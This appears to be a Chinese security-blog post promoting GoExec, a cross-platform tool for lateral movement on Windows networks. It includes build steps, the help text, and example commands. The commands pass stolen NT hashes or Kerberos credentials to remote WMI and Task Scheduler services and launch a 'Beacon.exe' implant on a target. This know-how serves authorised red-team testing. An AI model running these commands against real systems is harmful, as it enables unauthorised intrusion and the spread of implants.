工具推荐 | 全新支持跨平台内网横向渗透工具 - 新鲜讯息

点击上方蓝字关注我们

现在只对常读和星标的公众号才展示大图推送，建议大家能把星落安全团队“设为星标”，否则可能就看不到了啦！

工具介绍

GoExec是一款用于在Windows上进行横向移动远程执行命令和程序的全新工具。支持在windows、Linux上运行程序。

GoExec 实现了许多基本未实现的执行方法，并在整体上提供了显著的 OPSEC 改进。有关 GoExec v0.1.0 的原始帖子请参考以下文章

https://www.falconops.com/blog/introducing-goexec

工具编译

对于预发布功能，请获取最新的提交并手动构建。

# (Linux) Install GoExec manually from source# Fetch sourcegit clone https://github.com/FalconOpsLLC/goexeccd goexec# Build goexec (Go >= 1.23)CGO_ENABLED=0 go build -ldflags="-s -w"# (Optional) Install goexec to /usr/local/bin/goexecsudo install ./goexec /usr/local/bin

工具使用

GoExec 由所使用的每个远程服务的模块（即 wmi、scmr 等）和每个模块中的特定方法（即 wmi proc、scmr change 等）组成。

Usage:  goexec [command] [flags]Execution Commands:  dcom        Execute with Distributed Component Object Model (MS-DCOM)  wmi         Execute with Windows Management Instrumentation (MS-WMI)  scmr        Execute with Service Control Manager Remote (MS-SCMR)  tsch        Execute with Windows Task Scheduler (MS-TSCH)Additional Commands:  help        Help about any command  completion  Generate the autocompletion script for the specified shellLogging:  -D, --debug           Enable debug logging  -O, --log-file file   Write JSON logging output to file  -j, --json            Write logging output in JSON lines  -q, --quiet           Disable info loggingAuthentication:  -u, --user user@domain      Username ('user@domain', 'domainuser', 'domain/user' or 'user')  -p, --password string       Password  -H, --nt-hash hash          NT hash ('NT', ':NT' or 'LM:NT')      --aes-key hex key       Kerberos AES hex key      --pfx file              Client certificate and private key as PFX file      --pfx-password string   Password for PFX file      --ccache file           Kerberos CCache file name (defaults to $KRB5CCNAME, currently unset)      --dc string             Domain controller  -k, --kerberos              Use Kerberos authenticationUse "goexec [command] --help" for more information about a command.

WMI 模块

wmi 模块使用远程 Windows Management Instrumentation （WMI）生成进程（wmi proc）或手动调用方法（wmi 调用）。

# Run an executable without arguments./goexec wmi proc "$target"   -u "$auth_user"   -p "$auth_pass"   -e 'C:WindowsTempBeacon.exe' # Authenticate with NT hash, fetch output from `cmd.exe /c whoami /all`./goexec wmi proc "$target"   -u "$auth_user"   -H "$auth_nt"   -e 'cmd.exe'   -a '/C whoami /all'   -o- # Fetch output to STDOUT

Task Scheduler模块

该模块利用 Windows Task Scheduler 服务（MS-TSCH）在远程目标上生成进程。

Usage:  goexec tsch [command] [flags]Available Commands:  demand      Register a remote scheduled task and demand immediate start  create      Create a remote scheduled task with an automatic start time  change      Modify an existing task to spawn an arbitrary process... [inherited flags] ...Network:  -x, --proxy URI           Proxy URI  -F, --epm-filter string   String binding to filter endpoints returned by the RPC endpoint mapper (EPM)      --endpoint string     Explicit RPC endpoint definition      --no-epm              Do not use EPM to automatically detect RPC endpoints      --no-sign             Disable signing on DCERPC messages      --no-seal             Disable packet stub encryption on DCERPC messages

创建计划任务

该方法使用 SchRpcRegisterTask 注册计划任务，并通过 TimeTrigger 自动开始时间，并使用 DeleteExpiredTaskAfter 设置选择自动删除。

# Authenticate with NT hash via Kerberos, register task at MicrosoftWindowsGoExec, execute `C:WindowsTempBeacon.exe`./goexec tsch create "$target"   --user "${auth_user}@${domain}"   --nt-hash "$auth_nt"   --dc "$dc_ip"   --kerberos   --task 'MicrosoftWindowsGoExec'   --exec 'C:WindowsTempBeacon.exe'